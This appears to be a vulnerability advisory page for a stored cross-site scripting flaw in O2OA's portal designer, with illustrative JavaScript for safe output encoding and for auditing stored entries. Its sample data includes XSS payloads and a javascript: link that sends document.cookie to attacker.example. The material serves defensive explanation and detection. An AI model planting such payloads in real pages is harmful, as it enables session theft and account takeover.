CVE-2025-9658 in O2OA

Summary

by MITRE • 08/29/2025

A flaw has been found in O2OA up to 10.0-410. Affected is an unknown function of the file /x_portal_assemble_designer/jaxrs/dict/ of the component Personal Profile Page. Manipulation of the argument name/alias/description leads to cross-site scripting. The attack can be launched remotely. The exploit has been published and may be used. The vendor replied in the GitHub issue (translated from simplified Chinese): "This issue will be fixed in the new version."


Analysis

by VulDB Data Team • 09/17/2025

CVE-2025-9658 affects O2OA version 10.0-410 and earlier, in the Personal Profile Page component. The flaw sits in the endpoint /x_portal_assemble_designer/jaxrs/dict/, which handles dictionary (dict) data for the portal designer. The user-supplied name, alias and description parameters are not sanitized before the stored values are rendered back to the browser, which is a classic stored cross-site scripting condition: an attacker places script in a dictionary entry, and it executes in the browsers of the other users who view the page where that entry is displayed.

Technically, the defect is missing output encoding. When a designer or user saves data through the personal profile page interface, the application does not HTML-encode special characters in the name/alias/description fields before placing them in the page, so a value containing a script tag or an event-handler attribute is emitted as live markup rather than as text. The weakness is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation, "Cross-site Scripting"). The encoding failure happens on the server, or in the front-end that renders the server's response, but the injected script runs in the victim's browser inside the victim's session: the impact is client-side, not server-side code execution. The attack vector is ordinary HTTP/HTTPS requests. The analysis rates the attack as requiring no authentication; because /x_portal_assemble_designer/ is the portal designer's own endpoint, confirm on your instance whether saving dictionary entries really is reachable without a session before carrying that rating into your risk assessment.
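The rendering pattern described above, as an added example in JavaScript (this is illustrative code, not O2OA's own front-end): a dictionary entry concatenated into markup without encoding, beside the hardened form that encodes each field for the context it lands in. The field names (name, alias, description), the renderDict* function names and the sample payload are assumptions; the payload is a generic stored-XSS probe, not the published exploit.

```javascript
// Added example (not O2OA's code): a dictionary entry rendered into an HTML
// table row without output encoding, beside the hardened version.
// Field names, function names and the payload are assumptions for illustration.

// Constructed entry, as an attacker could store it. Generic stored-XSS
// probes, not the published exploit.
const storedEntry = {
  name: '<img src=x onerror="alert(document.cookie)">',
  alias: 'profile',
  description: 'Profile dictionary</td><script>alert(1)</script>',
};

// Vulnerable pattern: user-controlled strings concatenated straight into
// markup. A browser assigning this to innerHTML executes the payload.
function renderDictVulnerable(entry) {
  return `<tr><td>${entry.name}</td><td>${entry.alias}</td><td>${entry.description}</td></tr>`;
}

// Output encoding for HTML text and double/single-quoted attribute contexts.
// Ampersand goes first so the entities produced by the later replacements
// are not themselves re-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Hardened pattern: every user-controlled value is encoded before it is
// placed in the markup. (In a real DOM, prefer textContent over innerHTML.)
function renderDictHardened(entry) {
  const cells = ['name', 'alias', 'description'].map(
    (field) => `<td>${escapeHtml(entry[field])}</td>`,
  );
  return `<tr>${cells.join('')}</tr>`;
}

// Check used here to show the difference: list every element name in the
// markup that is not one of the template's own <tr>/<td> tags. Anything
// else came from the data and would be parsed as live markup.
function injectedTags(html) {
  const own = new Set(['tr', 'td']);
  return [...html.matchAll(/<\/?([a-z][a-z0-9]*)/gi)]
    .map((m) => m[1].toLowerCase())
    .filter((tag) => !own.has(tag));
}

console.log('vulnerable:', injectedTags(renderDictVulnerable(storedEntry))); // [ 'img', 'script', 'script' ]
console.log('hardened:  ', injectedTags(renderDictHardened(storedEntry)));   // []
```

The vulnerable renderer leaks three attacker-supplied elements into the row; the hardened one leaks none, because every `<` in the data reaches the browser as `&lt;`. The closing `</td>` inside the description shows why encoding, not tag stripping, is the fix: an unencoded value can close the template's own elements and start new ones.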

Remote exploitation carries real operational risk for organizations running affected O2OA versions. An attacker can use the flaw to steal session cookies (where they are not marked HttpOnly), perform actions in the application on behalf of the victim, redirect the victim to a malicious site, or run arbitrary script in the victim's origin. The published exploit lowers the skill needed to attack, although the EPSS score listed below (0.00078) and the "very low" activity rating indicate little observed exploitation at the time of writing. Because the payload runs with the privileges of whoever views it, the flaw is effectively a privilege escalation path: an administrator who views a poisoned profile page hands the attacker an administrative session and everything that session can do in the application. The component's role in profile management also makes the injection persistent, so a stored payload keeps firing for every viewer until the entry is cleaned up, and it can go unnoticed for a long time.

The vendor has acknowledged the issue in the GitHub issue and committed to a fix in a future release. Until a fixed build ships, operators cannot correct the encoding themselves, so mitigation is about limiting exposure: restrict who can reach /x_portal_assemble_designer/ (network segmentation or access controls in front of the designer), add web application firewall rules that reject HTML tags and event-handler attributes in the name, alias and description parameters sent to that path, and consider a Content Security Policy that disallows inline script, tested carefully because portal front-ends frequently depend on inline script. Because the injection is stored, also audit the dictionary entries already present on each installation for markup in those three fields and remove anything suspicious. The durable fix is the vendor's: proper output encoding of user-controlled fields in the affected component, confirmed by code review of that component. Monitor the vendor's releases for the patch addressing this CWE-79 issue and apply it promptly.
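The audit step above, as an added example in JavaScript (illustrative code, not O2OA's): a hunting check over an export of stored dictionary entries that reports which field of which entry carries markup an XSS payload needs. The record shape (id, name, alias, description) and the sample entries are constructed; on a real instance, feed it the rows from the dictionary store or the dict listing response. The last sample entry shows that a bare `<` in ordinary text is not flagged.

```javascript
// Added example (not O2OA's code): flag stored dictionary entries whose
// name/alias/description carry markup that would execute when rendered.
// Record shape and sample data are constructed for illustration.

const entries = [
  { id: 'd1', name: 'holiday', alias: 'holiday', description: 'Company holiday list' },
  { id: 'd2', name: '<svg onload=alert(1)>', alias: 'probe', description: 'test' },
  { id: 'd3', name: 'links', alias: 'links',
    description: '<a href="javascript:fetch(\'//attacker.example/?c=\'+document.cookie)">portal</a>' },
  { id: 'd4', name: 'quota', alias: 'quota 3 < 5', description: 'flag when a < b' },
];

// Indicators of injected markup. Each is something a payload needs to
// execute; a lone '<' between words (entry d4) matches none of them.
const INDICATORS = [
  { reason: 'html tag',                re: /<\s*\/?\s*[a-z][^>]*>/i },
  { reason: 'event handler attribute', re: /\bon[a-z]+\s*=/i },
  { reason: 'javascript: url',         re: /javascript\s*:/i },
  { reason: 'encoded angle bracket',   re: /&(lt|gt|#x0*(3c|3e)|#0*(60|62));?/i },
];

const FIELDS = ['name', 'alias', 'description'];

// One finding per (entry, field, indicator), so the output says exactly why.
function scanEntry(entry) {
  const findings = [];
  for (const field of FIELDS) {
    const value = String(entry[field] ?? '');
    for (const { reason, re } of INDICATORS) {
      if (re.test(value)) findings.push({ id: entry.id, field, reason });
    }
  }
  return findings;
}

function scanEntries(list) {
  return list.flatMap(scanEntry);
}

for (const f of scanEntries(entries)) console.log(`${f.id}.${f.field}: ${f.reason}`);
```

Run against the sample data it reports d2 (a tag plus an event handler in the name) and d3 (a tag plus a javascript: URL in the description) and stays quiet on d1 and d4. Treat the indicators as a triage filter, not a parser: they are tuned to avoid noise on comparison operators in plain text, so anything they do flag deserves a look by hand.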

Responsible

VulDB

Disclosure

08/29/2025

Moderation

accepted

CPE

ready

Exploit

Download

EPSS

0.00078

KEV

no

Activities

very low
